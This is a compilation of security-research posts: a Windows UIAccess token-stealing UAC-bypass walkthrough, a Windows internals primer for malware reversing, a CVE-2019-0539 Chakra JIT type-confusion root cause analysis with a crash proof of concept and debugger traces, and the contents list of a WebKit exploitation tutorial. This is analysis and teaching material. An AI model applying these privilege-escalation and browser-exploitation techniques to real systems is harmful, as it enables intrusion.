I mentioned in a previous blog post that Windows RS5 finally kills the abuse of Access Tokens, as far as I can tell, to elevate to admin by just opening the access token. This is a shame, but personally I didn't care. However, I was contacted on Twitter about some UAC related things, specifically getting UIAccess. I was surprised that people have not been curious enough to put two and two together and realize that the previous token stealing bug can still be used to get you UIAccess even if the direct path to admin has been blocked. This blog post gives a bit of information on why you might care about UIAccess and how you can get your own code running as UIAccess.

TL;DR; you can do the same token stealing trick with UIAccess processes, which doesn't require an elevation prompt, then automate the UI of a privileged process to get a UAC bypass. An example PowerShell script which does this is on my github.

First, what is UIAccess? One of the related features of UAC was User Interface Privilege Isolation (UIPI). UIPI limits the ability of a process to interact with the windows of a higher integrity level process, preventing a malicious application from automating a privileged UI to elevate privileges. There are of course some holes which have been discovered over the years, but the fundamental principle is sound. However there's a big problem: what about Assistive Technologies? Many people rely on on-screen keyboards, screen readers and the like, and they won't work if you can't read and automate the privileged UI. If you're blind does that mean you can't be an administrator? The design Microsoft went with was a backdoor to UIPI: a special flag added to Access Tokens called UIAccess. When this flag is set most of the UIPI features of WIN32K are relaxed.
From an escalation perspective, if you have UIAccess you can automate the windows of a higher integrity process, say an administrator command prompt, and use that access to bypass further UAC prompts. You can set the UIAccess flag on a token by calling SetTokenInformation and passing the TokenUIAccess information class. If you do that you'll find that you can't set the flag as a normal user; you need SeTcbPrivilege, which is typically only granted to SYSTEM. If you need a "God" privilege to set the flag, how does UIAccess get set in normal operation?

You need to get the AppInfo service to spawn your process with an appropriate set of flags, or just call ShellExecute. As the service runs as SYSTEM with SeTcbPrivilege it can set the UIAccess flag on start up. While the Consent application will spawn for UIAccess, no UAC prompt will show (otherwise what's the point?). The AppInfo service spawns admin UAC processes, however by setting the uiAccess attribute in your manifest to true it'll instead spawn your process as UIAccess. However, it's not that simple: as per this link you also need to sign the executable (easy as it can be self-signed), and the executable must be in a secure location such as System32 or Program Files (harder). To prevent a malicious application spawning a UIAccess process and then injecting code into it, the AppInfo service tweaks the integrity of the token to be High (for split-token admin) or the current integrity plus 16 for normal users. This elevated integrity blocks read/write access to the new process.

Of course there are bugs; for example I found one in 2014, since fixed, in the secure location check by abusing directory NTFS named streams. UACME also has an exploit which abuses UIAccess (method 32, based on this blog post) if you can find a writable secure location directory or abuse the existing IFileOperation tricks to write a file into the appropriate location. However, for those keeping score, UIAccess is a property of the access token.
As the OS doesn't do anything special to clear it, you can open the token from an existing UIAccess process, take its token, create a new process with that token and start automating the heck out of privileged windows.

In summary, here's how to exploit this behavior on a completely default install of Windows 10 RS5 and below:

1. Find or start a UIAccess process, such as the on-screen keyboard (OSK.EXE). As AppInfo doesn't prompt for UIAccess this can be done, relatively, silently.
2. Open the process for PROCESS_QUERY_LIMITED_INFORMATION access. This is allowed as long as you have any access to the process. This could even be done from a Low integrity process (but not from an AC), although on Windows 10 RS5 some other sandbox mitigations get in the way in the next step, but it should work on Windows 7.
3. Open the process token for TOKEN_DUPLICATE access and duplicate the token to a new writable primary token.
4. Set the new token's integrity to match your current token's integrity.
5. Use the token in CreateProcessAsUser to spawn a new process with the UIAccess flag.
6. Automate the UI to your heart's desire.

Based on my original blogs you might wonder how I can create a new process with the token when previously I could only impersonate. For UIAccess the AppInfo service just modifies a copy of the caller's token rather than using the linked token. This means the UIAccess token is considered a sibling of any other process on the desktop, and so you are permitted to assign it as the primary token as long as the integrity is dropped to be equal to or lower than the current integrity.

As an example I've uploaded a PowerShell script which does the attack and uses the SendKeys class to write an arbitrary command to a focused elevated command prompt on the desktop (how you get the command prompt is out of scope). There are almost certainly other tricks you can do once you've got UIAccess.
For example, if the administrator has set the "User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop" group policy then it's possible to disable the secure desktop from a UIAccess process and automate the elevation prompt itself.

In conclusion, while the old admin token stealing trick went away, that doesn't mean it has no remaining value. By abusing UIAccess programs we can almost certainly bypass UAC. Of course, as it's not a security boundary and is so full of holes, I'm not sure anyone cares about it.

Posted by tiraniddo at 15:42

Source: https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
Reverse Engineering Malware, Part 4: Windows Internals
July 4, 2017

Welcome back to my Reverse Engineering Malware series. In general, reverse engineering of malware is done on Windows systems. That's because despite recent inroads by Linux and the Mac OS, Windows systems still comprise over 90% of all computing systems in the world. As such, well over 90% of malware is designed to compromise Windows systems. For this reason, it makes sense to focus our attention on Windows operating systems.

When reversing malware, the operating system plays a key role. All applications interact with the operating system and are tightly integrated with the OS. We can gather a significant amount of information on the malware by probing the interface between the OS and the application (malware). To understand how malware can use and manipulate Windows, then, we need to better understand the inner workings of the Windows operating system. In this article, we will examine the inner workings of Windows 32-bit systems so that we can better understand how malware can use the operating system for its malicious purposes. Windows internals could fill several textbooks (and has), so I will attempt to cover just the most important topics, and only in a cursory way. I hope to leave you with enough information, though, that you can effectively reverse the malware in the following articles.

Virtual Memory
Virtual memory is the idea that instead of software directly accessing the physical memory, the CPU and the operating system create an invisible layer between the software and the physical memory. The OS creates a table that the CPU consults, called the page table, that directs the process to the location of the physical memory that it should use.

Processors divide memory into pages. Pages are fixed-size chunks of memory. Each entry in the page table references one page of memory. In general, 32-bit processors use 4 KB pages, with some exceptions.
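As a rough illustration of the paragraph above, the sketch below splits a 32-bit virtual address into a page number and an offset for 4 KB pages and looks the page up in a toy page table. The single-level pageTable map, the function names and the sample addresses are all made up for the example; real x86 hardware walks multi-level tables that the OS maintains.

```javascript
const PAGE_SIZE = 4096;   // 4 KB pages
const OFFSET_BITS = 12;   // log2(4096): the low 12 bits are the offset inside a page

// Split a 32-bit virtual address into its page number and in-page offset.
function splitVirtualAddress(va) {
  const addr = va >>> 0;                 // treat the value as unsigned 32-bit
  return {
    pageNumber: addr >>> OFFSET_BITS,    // upper 20 bits
    offset: addr & (PAGE_SIZE - 1),      // lower 12 bits
  };
}

// Toy page table (hypothetical): virtual page number -> physical frame number.
const pageTable = new Map([[0x00401, 0x1a2b3]]);

// Translate a virtual address, or return null where real hardware would raise a page fault.
function translate(va) {
  const { pageNumber, offset } = splitVirtualAddress(va);
  if (!pageTable.has(pageNumber)) return null;
  return pageTable.get(pageNumber) * PAGE_SIZE + offset;
}

const parts = splitVirtualAddress(0x00401abc);
const physical = translate(0x00401abc);
const unmapped = translate(0x7fff0000);

console.log(parts.pageNumber.toString(16), parts.offset.toString(16), physical.toString(16), unmapped);
```

The offset passes through translation unchanged; only the page number is replaced by a frame number, which is why the page table needs just one entry per page.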
Kernel v User Mode
Having a page table enables the processor to enforce rules on how memory will be accessed. For instance, page table entries often have flags that determine whether the page can be accessed from a non-privileged mode (user mode). In this way, the operating system's code can reside inside the process's address space without concern that it will be accessed by non-privileged processes. This protects the operating system's sensitive data. This distinction between privileged and non-privileged mode is what we call kernel (privileged) mode and user (non-privileged) mode.

Kernel Memory Space
The kernel reserves 2 GB of address space for itself. This address space contains all the kernel code, including the kernel itself and any other kernel components such as device drivers.

Paging
Paging is the process where memory regions are temporarily flushed to the hard drive when they have not been used recently. The time since each page of memory was last used is tracked, and the oldest pages are flushed. Obviously, physical memory is faster and more expensive than space on the hard drive. The Windows operating system tracks when a page was last accessed and then uses that information to locate pages that haven't been accessed in a while. Windows then flushes their content to a file. The contents of the flushed pages can then be discarded and the space used for other information. When the operating system needs to access these flushed pages, a page fault is generated and the system then determines that the information has been "paged out" to a file. The operating system then accesses the page file and pulls the information back into memory to be used.

Objects and Handles
The Windows kernel manages objects using a centralized object manager component. This object manager is responsible for all kernel objects such as sections, files, device objects, synchronization objects, processes and threads. It ONLY manages kernel objects.
GUI-related objects are managed by separate object managers that are implemented inside WIN32K.SYS. Kernel code typically accesses objects using direct pointers to the object data structures. Applications use handles for accessing individual objects.

Handles
A handle is a process-specific numeric identifier that serves as an index into the process's private handle table. Each entry in the handle table contains a pointer to the underlying object, which is how the system associates handles with objects. Each handle entry also contains an access mask that determines which types of operations can be performed on the object using this specific handle.

Processes
A process is really just an isolated memory address space that is used to run a program. Address spaces are created for every program to make sure that each program runs in its own address space without colliding with other processes. Inside a process's address space the system can load code modules, but the process must have at least one thread running to do so.

Process Initialization
The creation of the process object and the new address space is the first step. When a process calls the Win32 API CreateProcess, the API creates a process object and allocates a new memory address space for the process. CreateProcess maps NTDLL.DLL and the program executable (the .exe file) into the newly created address space. CreateProcess creates the process's first thread and allocates stack space for it. The process's first thread is resumed and starts running in the LdrpInitialize function inside NTDLL.DLL. LdrpInitialize recursively traverses the primary executable's import tables and maps into memory every executable that is required. At this point, control passes into LdrpRunInitializeRoutines, which is an internal NTDLL routine responsible for initializing all statically linked DLL's currently loaded into the address space.
The initialization process consists of calling each DLL's entry point with the DLL_PROCESS_ATTACH constant. Once all the DLL's are initialized, LdrpInitialize calls the thread's real initialization routine, which is the BaseProcessStart function from KERNEL32.DLL. This function in turn calls the executable's WinMain entry point, at which point the process has completed its initialization sequence.

Threads
At any given moment, each processor in the system is running one thread. Instead of continuing to run a single piece of code until it completes, Windows can decide to interrupt a running thread at any given time and switch to execution of another thread. A thread is a data structure that has a CONTEXT data structure. The key points are:
(1) the CONTEXT holds the state of the processor when the thread last ran
(2) each thread has one or two memory blocks that are used for stack space
(3) stack space is used to save the current state of the thread when it is context switched
(4) the components that manage threads in Windows are the scheduler and the dispatcher
(5) together they decide which thread gets to run and for how long, and perform the context switch

Context Switch
A context switch is the thread interruption. In some cases, threads just give up the CPU on their own and the kernel doesn't have to interrupt them. Every thread is assigned a quantum, which quantifies how long the thread can run without interruption. Once the quantum expires, the thread is interrupted and other threads are allowed to run. This entire process is transparent to the thread. The kernel stores the state of the CPU registers before suspending the thread and then restores that register state when the thread is resumed.

Win32 API
An API is a set of functions that the operating system makes available to application programs for communicating with the OS. The Win32 API is a large set of functions that make up the official low-level programming interface for Windows applications. The MFC is a common interface to the Win32 API.
The three main components of the Win32 API are:
(1) Kernel or Base API's: these are the non-GUI-related services such as I/O, memory, object, and process and thread management
(2) GDI API's: these include low-level graphics services such as those for drawing a line, displaying a bitmap, etc.
(3) USER API's: these are the higher-level GUI-related services such as window management, menus, dialog boxes and user-interface controls

System Calls
A system call is when user mode code needs to call a kernel mode function. This usually happens when an application calls an operating system API. User mode code invokes a special CPU instruction that tells the processor to switch to its privileged mode and call a dispatch routine. This dispatch routine then calls the specific system function requested from user mode.

PE Format
The Windows executable format is PE (Portable Executable). The term "portable" refers to the format's versatility in numerous environments and architectures. Executable files are relocatable. This means that they could be loaded at a different virtual address each time they are loaded. An executable must coexist with other executables that are loaded in the same address space. Other than the main executable, every program has a certain number of additional executables loaded into its address space, regardless of whether it has DLL's of its own or not.

Relocation Issues
If two executables attempt to be loaded at the same virtual address, one must be relocated to another virtual address. Each executable module is assigned a base address, and if something is already there, it must be relocated. There are never absolute memory addresses in executable headers; those only exist in the code. To make this work, whenever there is a pointer inside the executable header, it is always a relative virtual address (RVA). Think of this as simply an offset.
When the file is loaded, it is assigned a virtual address and the loader calculates real virtual addresses out of RVA's by adding the module's base address to an RVA.

Image Sections
An executable image is divided into individual sections in which the file's contents are stored. Sections are needed because different areas in the file are treated differently by the memory manager when a module is loaded. A common division is a code section (also called text) containing the executable's code and a data section containing the executable's data. When the image is loaded, the memory manager sets the access rights on memory pages in the different sections based on their settings in the section header.

Section Alignment
Individual sections often have different access settings defined in the executable header. The memory manager must apply these access settings when an executable image is loaded. Sections must typically be page aligned when an executable is loaded into memory. Page-aligning sections in the file itself would waste space on disk. Therefore, the PE header has two different kinds of alignment fields: section alignment and file alignment.

DLL's
DLL's allow a program to be broken into more than one executable file. In this way, overall memory consumption is reduced, because executables are not loaded until the features they implement are required. Individual components can be replaced or upgraded to modify or improve a certain aspect of the program. DLL's can dramatically reduce overall system memory consumption because the system can detect that a certain executable has been loaded into more than one address space, then map it into each address space instead of reloading it into a new memory location. DLL's are different from static libraries (.lib), which are linked into the executable.

Loading DLL's
Static linking is implemented by having each module list the modules it uses and the functions it calls within each module. This is known as an import table (see IDA Pro tutorial).
Run time linking refers to a different process whereby an executable can decide to load another executable at runtime and call a function from that executable.

PE Headers
A Portable Executable (PE) file starts with a DOS header, whose stub prints "This program cannot be run in DOS mode".

    typedef struct _IMAGE_NT_HEADERS {
        DWORD Signature;
        IMAGE_FILE_HEADER FileHeader;
        IMAGE_OPTIONAL_HEADER32 OptionalHeader;
    } IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

This data structure references two data structures which contain the actual PE header.

Imports and Exports
Imports and Exports are the mechanisms that enable the dynamic linking process of executables. The compiler has no idea of the actual addresses of the imported functions; only at runtime will these addresses be known. To solve this issue, the linker creates an import table that lists all the functions imported by the current module by their names.

Source: https://www.hackers-arise.com/single-post/2017/07/04/Reverse-Engineering-Malware-Part-4-Windows-Internals
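The RVA arithmetic described under Relocation Issues in the article above can be sketched in a few lines. The rvaToVa helper, the relocated base and the sample RVA are assumptions chosen for illustration; 0x00400000 is used here only as the familiar default base of 32-bit executables.

```javascript
// Hypothetical helper: a relative virtual address (RVA) is an offset from the
// module's base address, so the loader only has to add the two together.
function rvaToVa(imageBase, rva) {
  return (imageBase + rva) >>> 0;   // keep the result as an unsigned 32-bit value
}

const preferredBase = 0x00400000;   // base address the module asked for
const relocatedBase = 0x00a50000;   // made-up base picked after a collision
const entryPointRva = 0x00001234;   // made-up RVA stored in a header field

// The same header value resolves correctly at either base,
// which is why headers store RVAs rather than absolute addresses.
const vaPreferred = rvaToVa(preferredBase, entryPointRva);
const vaRelocated = rvaToVa(relocatedBase, entryPointRva);

console.log(vaPreferred.toString(16), vaRelocated.toString(16));
```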
CVE-2019-0539 Root Cause Analysis. Microsoft Edge Chakra JIT Type Confusion
Rom Cncynatus and Shlomi Levin

Introduction.
CVE-2019-0539 was fixed in the Microsoft Edge Chakra Engine update for January 2019. This bug and 2 others were discovered and reported by Lokihardt of Google Project Zero. The bug can lead to remote code execution when the victim visits a malicious web page. As Lokihardt describes, this type confusion bug occurs when the code generated by the Chakra just-in-time (JIT) JavaScript compiler unknowingly performs a type transition of an object and incorrectly assumes no side effects on the object later on. As Abhijith Chatra of the Chakra dev team describes in his blog, dynamic type objects have a property map and a slot array. The property map is used to know the index of an object's property in the slot array. The slot array stores the actual data of the property. CVE-2019-0539 causes the JIT code to confuse the object's layout in memory, which causes the slot array pointer to be overwritten with arbitrary data.

Setup.
Build the vulnerable version of ChakraCore for Windows: https://github.com/Microsoft/ChakraCore/wiki/Building-ChakraCore
(in Visual Studio MSBuild Command Prompt)

    c:\code>git clone https://github.com/Microsoft/ChakraCore.git
    c:\code>cd ChakraCore
    c:\code\ChakraCore>git checkout 331aa3931ab69ca2bd64f7e020165e693b8030b5
    c:\code\ChakraCore>msbuild /m /p:Platform=x64 /p:Configuration=Debug Build\Chakra.Core.sln

Time Travel Debugging.
This blog makes use of TTD (Time Travel Debugging). As described by Microsoft: Time Travel Debugging is a tool that allows you to record an execution of your process running, then replay it later both forwards and backwards. Time Travel Debugging (TTD) can help you debug issues easier by letting you "rewind" your debugger session, instead of having to reproduce the issue until you find the bug.
Install the latest WinDbg Preview from the Microsoft Store. Don't forget to run it with Administrator privileges.

Root Cause Analysis.
PoC:

    function opt(o, c, value) {
        o.b = 1;

        class A extends c { // may transition the object
        }

        o.a = value; // overwrite slot array pointer
    }

    function main() {
        for (let i = 0; i < 2000; i++) {
            let o = {a: 1, b: 2};
            opt(o, (function () {}), {});
        }

        let o = {a: 1, b: 2};
        let cons = function () {};

        cons.prototype = o; // causes "class A extends c" to transition the object type

        opt(o, cons, 0x1234);

        print(o.a); // access the slot array pointer resulting in a crash
    }

    main();

Run the debugger with TTD until it crashes and then perform the following commands:

    0:005> !tt 0
    Setting position to the beginning of the trace
    Setting position: 14:0
    (1e8c.4bc8): Break instruction exception - code 80000003 (first/second chance not available)
    Time Travel Position: 14:0
    ntdll!LdrInitializeThunk:
    00007fff`03625640 4053 push rbx
    0:000> g
    ModLoad: 00007fff`007e0000 00007fff`0087e000 C:\Windows\System32\sechost.dll
    ModLoad: 00007fff`00f40000 00007fff`00fe3000 C:\Windows\System32\advapi32.dll
    ModLoad: 00007ffe`ffde0000 00007ffe`ffe00000 C:\Windows\System32\win32u.dll
    ModLoad: 00007fff`00930000 00007fff`00ac7000 C:\Windows\System32\USER32.dll
    ModLoad: 00007ffe`ff940000 00007ffe`ffada000 C:\Windows\System32\gdi32full.dll
    ModLoad: 00007fff`02e10000 00007fff`02e39000 C:\Windows\System32\GDI32.dll
    ModLoad: 00007fff`03420000 00007fff`03575000 C:\Windows\System32\ole32.dll
    ModLoad: 00007ffe`ffdb0000 00007ffe`ffdd6000 C:\Windows\System32\bcrypt.dll
    ModLoad: 00007ffe`e7c20000 00007ffe`e7e0d000 C:\Windows\SYSTEM32\dbghelp.dll
    ModLoad: 00007ffe`e7bf0000 00007ffe`e7c1a000 C:\Windows\SYSTEM32\dbgcore.DLL
    ModLoad: 00007ffe`9bf10000 00007ffe`9dd05000 c:\pp\ChakraCore\Build\VcBuild\bin\x64_debug\chakracore.dll
    ModLoad: 00007fff`011c0000 00007fff`011ee000 C:\Windows\System32\IMM32.DLL
    ModLoad: 00007ffe`ff5b0000 00007ffe`ff5c1000 C:\Windows\System32\kernel.appcore.dll
    ModLoad: 00007ffe`f0f80000 00007ffe`f0fdc000 C:\Windows\SYSTEM32\Bcp47Langs.dll
    ModLoad: 00007ffe`f0f50000 00007ffe`f0f7a000 C:\Windows\SYSTEM32\bcp47mrm.dll
    ModLoad: 00007ffe`f0fe0000 00007ffe`f115b000 C:\Windows\SYSTEM32\windows.globalization.dll
    ModLoad: 00007ffe`ff010000 00007ffe`ff01c000 C:\Windows\SYSTEM32\CRYPTBASE.DLL
    (1e8c.20b8): Access violation - code c0000005 (first/second chance not available)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    Time Travel Position: 90063:0
    chakracore!Js::DynamicTypeHandler::GetSlot+0x149:
    00007ffe`9cd1ec79 488b04c1 mov rax,qword ptr [rcx+rax*8] ds:00010000`00001234=????????????????
    0:004> ub
    chakracore!Js::DynamicTypeHandler::GetSlot+0x12d [c:\pp\chakracore\lib\runtime\types\typehandler.cpp @ 96]:
    00007ffe`9cd1ec5d 488b442450 mov rax,qword ptr [rsp+50h]
    00007ffe`9cd1ec62 0fb74012 movzx eax,word ptr [rax+12h]
    00007ffe`9cd1ec66 8b4c2460 mov ecx,dword ptr [rsp+60h]
    00007ffe`9cd1ec6a 2bc8 sub ecx,eax
    00007ffe`9cd1ec6c 8bc1 mov eax,ecx
    00007ffe`9cd1ec6e 4898 cdqe
    00007ffe`9cd1ec70 488b4c2458 mov rcx,qword ptr [rsp+58h] // object pointer
    00007ffe`9cd1ec75 488b4910 mov rcx,qword ptr [rcx+10h] // slot array pointer
    0:004> ba w 8 poi(@rsp+58)+10
    0:004> g-
    Breakpoint 1 hit
    Time Travel Position: 9001D:178A
    00000195`cc9c0159 488bc7 mov rax,rdi

Below is the JIT code that ultimately overwrites the pointer to the slot array. Notice the call to chakracore!Js::JavascriptOperators::OP_InitClass. As Lokihardt explained, this function will ultimately invoke SetIsPrototype, which will transition the object type.
    0:004> ub @rip L20
    00000195`cc9c00c6 ef out dx,eax
    00000195`cc9c00c7 0000 add byte ptr [rax],al
    00000195`cc9c00c9 004c0f45 add byte ptr [rdi+rcx+45h],cl
    00000195`cc9c00cd f249895e18 repne mov qword ptr [r14+18h],rbx
    00000195`cc9c00d2 4c8bc7 mov r8,rdi
    00000195`cc9c00d5 498bcf mov rcx,r15
    00000195`cc9c00d8 48baf85139ca95010000 mov rdx,195CA3951F8h
    00000195`cc9c00e2 48b8d040a39cfe7f0000 mov rax,offset chakracore!Js::ScriptFunction::OP_NewScFuncHomeObj (00007ffe`9ca340d0)
    00000195`cc9c00ec 48ffd0 call rax
    00000195`cc9c00ef 488bd8 mov rbx,rax
    00000195`cc9c00f2 498bd5 mov rdx,r13
    00000195`cc9c00f5 488bcb mov rcx,rbx
    00000195`cc9c00f8 c60601 mov byte ptr [rsi],1
    00000195`cc9c00fb 49b83058e8c995010000 mov r8,195C9E85830h
    00000195`cc9c0105 48b88041679cfe7f0000 mov rax,offset chakracore!Js::JavascriptOperators::OP_InitClass (00007ffe`9c674180) // transitions the type of the object
    00000195`cc9c010f 48ffd0 call rax
    00000195`cc9c0112 803e01 cmp byte ptr [rsi],1
    00000195`cc9c0115 0f85dc000000 jne 00000195`cc9c01f7
    00000195`cc9c011b 488bc3 mov rax,rbx
    00000195`cc9c011e 48c1e830 shr rax,30h
    00000195`cc9c0122 0f85eb000000 jne 00000195`cc9c0213
    00000195`cc9c0128 4c8b6b08 mov r13,qword ptr [rbx+8]
    00000195`cc9c012c 498bc5 mov rax,r13
    00000195`cc9c012f 48c1e806 shr rax,6
    00000195`cc9c0133 4883e007 and rax,7
    00000195`cc9c0137 48b9b866ebc995010000 mov rcx,195C9EB66B8h
    00000195`cc9c0141 33d2 xor edx,edx
    00000195`cc9c0143 4c3b2cc1 cmp r13,qword ptr [rcx+rax*8]
    00000195`cc9c0147 0f85e2000000 jne 00000195`cc9c022f
    00000195`cc9c014d 480f45da cmovne rbx,rdx
    00000195`cc9c0151 488b4310 mov rax,qword ptr [rbx+10h]
    00000195`cc9c0155 4d896610 mov qword ptr [r14+10h],r12 // trigger of CVE-2019-0539. Overridden slot array pointer

Below is a memory dump of the object just before the OP_InitClass invocation by the JIT code. Notice how the object's two slots are inlined in the object's memory (rather than being stored in a separate slot array).
    Time Travel Position: 8FE48:C95
    chakracore!Js::JavascriptOperators::OP_InitClass:
    00007ffe`9c674180 4c89442418 mov qword ptr [rsp+18h],r8 ss:00000086`971fd710=00000195ca395030
    0:004> dps 00000195`cd274440
    00000195`cd274440 00007ffe`9d6e1790 chakracore!Js::DynamicObject::`vftable'
    00000195`cd274448 00000195`ca3c1d40
    00000195`cd274450 00010000`00000001 // inline slot 1
    00000195`cd274458 00010000`00000001 // inline slot 2
    00000195`cd274460 00000195`cd274440
    00000195`cd274468 00010000`00000000
    00000195`cd274470 00000195`ca3b4030
    00000195`cd274478 00000000`00000000
    00000195`cd274480 00000195`cd073ed0
    00000195`cd274488 00000000`00000000
    00000195`cd274490 00000000`00000000
    00000195`cd274498 00000000`00000000
    00000195`cd2744a0 00000195`cd275c00
    00000195`cd2744a8 00010000`00000000
    00000195`cd2744b0 00000195`ca3dc100
    00000195`cd2744b8 00000000`00000000

The following callstack shows that SetIsPrototype is ultimately invoked by OP_InitClass, thus transitioning the object's type. As a result of the transition, the two slots are no longer inlined but are stored in the slot array instead. This transition will later be ignored by the rest of the JIT code.
0:004> kb # RetAddr : Args to Child : Call Site 00 00007ffe`9cd0dace : 00000195`cd274440 00000195`ca3a0000 00000195`00000004 00007ffe`9bf6548b : chakracore!Js::DynamicTypeHandler::AdjustSlots+0x79f [c:\pp\chakracore\lib\runtime\types\typehandler.cpp @ 755] 01 00007ffe`9cd24181 : 00000195`cd274440 00000195`cd264f60 00000195`000000fb 00007ffe`9c200002 : chakracore!Js::DynamicObject::DeoptimizeObjectHeaderInlining+0xae [c:\pp\chakracore\lib\runtime\types\dynamicobject.cpp @ 591] 02 00007ffe`9cd2e393 : 00000195`ca3da0f0 00000195`cd274440 00000195`00000002 00007ffe`9cd35f00 : chakracore!Js::PathTypeHandlerBase::ConvertToSimpleDictionaryType<Js::SimpleDictionaryTypeHandlerBase >+0x1b1 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.cpp @ 1622] 03 00007ffe`9cd40ac2 : 00000195`ca3da0f0 00000195`cd274440 00000000`00000002 00007ffe`9bf9fe00 : chakracore!Js::PathTypeHandlerBase::TryConvertToSimpleDictionaryType<Js::SimpleDictionaryTypeHandlerBase >+0x43 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.cpp @ 1598] 04 00007ffe`9cd3cf81 : 00000195`ca3da0f0 00000195`cd274440 00000195`00000002 00007ffe`9cd0c700 : chakracore!Js::PathTypeHandlerBase::TryConvertToSimpleDictionaryType+0x32 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.h @ 297] 05 00007ffe`9cd10a9f : 00000195`ca3da0f0 00000195`cd274440 00000001`0000001c 00007ffe`9c20c563 : chakracore!Js::PathTypeHandlerBase::SetIsPrototype+0xe1 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.cpp @ 2892] 06 00007ffe`9cd0b7a3 : 00000195`cd274440 00007ffe`9bfa722e 00000195`cd274440 00007ffe`9bfa70a3 : chakracore!Js::DynamicObject::SetIsPrototype+0x23f [c:\pp\chakracore\lib\runtime\types\dynamicobject.cpp @ 680] 07 00007ffe`9cd14b08 : 00000195`cd274440 00007ffe`9c20d013 00000195`cd274440 00000195`00000119 : chakracore!Js::RecyclableObject::SetIsPrototype+0x43 [c:\pp\chakracore\lib\runtime\types\recyclableobject.cpp @ 190] 08 00007ffe`9c6743ea : 00000195`cd275c00 00000195`cd274440 0000018d`00000119 00000195`c9e85830 : 
chakracore!Js::DynamicObject::SetPrototype+0x18 [c:\pp\chakracore\lib\runtime\types\dynamictype.cpp @ 632] 09 00000195`cc9c0112 : 00000195`cd264f60 00000195`cd273eb0 00000195`c9e85830 00007ffe`9c20c9b3 : chakracore!Js::JavascriptOperators::OP_InitClass+0x26a [c:\pp\chakracore\lib\runtime\language\javascriptoperators.cpp @ 7532] 0a 00007ffe`9cbea0d2 : 00000195`ca3966e0 00000000`10000004 00000195`ca395030 00000195`cd274440 : 0x00000195`cc9c0112 Below is a memory dump of the object after OP_InitClass invocation. Notice that the object has transitioned and that the 2 slots are no longer inlined. However, as said, the JIT code will still assume that the slots are inlined. Time Travel Position: 9001D:14FA 00000195`cc9c0112 803e01 cmp byte ptr [rsi],1 ds:0000018d`c8e72018=01 0:004> dps 00000195`cd274440 00000195`cd274440 00007ffe`9d6e1790 chakracore!Js::DynamicObject::`vftable' 00000195`cd274448 00000195`cd275d40 00000195`cd274450 00000195`cd2744c0 // slot array pointer (previously inline slot 1) 00000195`cd274458 00000000`00000000 00000195`cd274460 00000195`cd274440 00000195`cd274468 00010000`00000000 00000195`cd274470 00000195`ca3b4030 00000195`cd274478 00000195`cd277000 00000195`cd274480 00000195`cd073ed0 00000195`cd274488 00000195`cd073f60 00000195`cd274490 00000195`cd073f90 00000195`cd274498 00000000`00000000 00000195`cd2744a0 00000195`cd275c00 00000195`cd2744a8 00010000`00000000 00000195`cd2744b0 00000195`ca3dc100 00000195`cd2744b8 00000000`00000000 0:004> dps 00000195`cd2744c0 // slot array 00000195`cd2744c0 00010000`00000001 00000195`cd2744c8 00010000`00000001 00000195`cd2744d0 00000000`00000000 00000195`cd2744d8 00000000`00000000 00000195`cd2744e0 00000119`00000000 00000195`cd2744e8 00000000`00000100 00000195`cd2744f0 00000195`cd074000 00000195`cd2744f8 00000000`00000000 00000195`cd274500 000000c4`00000000 00000195`cd274508 00000000`00000102 00000195`cd274510 00000195`cd074030 00000195`cd274518 00000000`00000000 00000195`cd274520 000000fb`00000000 
00000195`cd274528 00000000`00000102 00000195`cd274530 00000195`cd074060 00000195`cd274538 00000000`00000000 Below is a memory dump of the object just after the JIT code wrongly assigns the property value, overriding the slot array pointer 0:004> dqs 00000195cd274440 00000195`cd274440 00007ffe`9d6e1790 chakracore!Js::DynamicObject::`vftable' 00000195`cd274448 00000195`cd275d40 00000195`cd274450 00010000`00001234 // overridden slot array pointer (CVE-2019-0539) 00000195`cd274458 00000000`00000000 00000195`cd274460 00000195`cd274440 00000195`cd274468 00010000`00000000 00000195`cd274470 00000195`ca3b4030 00000195`cd274478 00000195`cd277000 00000195`cd274480 00000195`cd073ed0 00000195`cd274488 00000195`cd073f60 00000195`cd274490 00000195`cd073f90 00000195`cd274498 00000000`00000000 00000195`cd2744a0 00000195`cd275c00 00000195`cd2744a8 00010000`00000000 00000195`cd2744b0 00000195`ca3dc100 00000195`cd2744b8 00000000`00000000 Finally, when accessing one of the object’s properties, the overridden slot array pointer is dereferenced, resulting in a crash 0:004> g (1e8c.20b8): Access violation - code c0000005 (first/second chance not available) First chance exceptions are reported before any exception handling. chakracore!Js::DynamicTypeHandler::GetSlot+0x149: 00007ffe`9cd1ec79 488b04c1 mov rax,qword ptr [rcx+rax*8] ds:00010000`00001234=???????????????? Final Thoughts. The debugging process was simplified thanks to the TTD addition of Windbg. Specifically, the ability to set a breakpoint and then run the program in reverse leading directly to the actual slot array pointer override. This feature really shows the power of CPU tracing and execution reconstruction for software debugging and reverse engineering. Sursa: https://perception-point.io/resources/research/cve-2019-0539-root-cause-analysis/
-
Webkit Exploitation Tutorial

Contents: Preface Setup Virtual Machine Source Code Debugger and Editor Test Compiling JavaScriptCore Triggering Bugs Understanding WebKit Vulnerability 1. Use After Free 2. Out of Bound 3. Type Confusion 4. Integer Overflow 5. Else JavaScriptCore in Depth JSC Value Representation JSC Object Model 0x0 Fast JSObject 0x1 JSObject with dynamically added fields 0x2 JSArray with room for 3 array elements 0x3 Object with fast properties and array elements 0x4 Object with fast and dynamic properties and array elements 0x5 Exotic object with dynamic properties and array elements Type Inference Watchpoints Compilers 0x0. LLInt 0x1. Baseline JIT and Byte Code Template 0x2. DFG 0x3. FTL 0x4. More About Optimization Garbage Collector (TODO) Writing Exploitation Analyzing Utility Functions Getting Native Code Controlling Bytes Writing Exploit Detail about the Script Conclusion on the Exploitation Debugging WebKit Setting Breakpoints Inspecting JSC Objects Getting Native Code 1 Day Exploitation Root Cause Quotation from Lokihardt Line by Line Explanation Debugging Constructing Attack Primitive addrof fakeobj Arbitrary R/W and Shellcode Execution Acknowledgement References

Preface
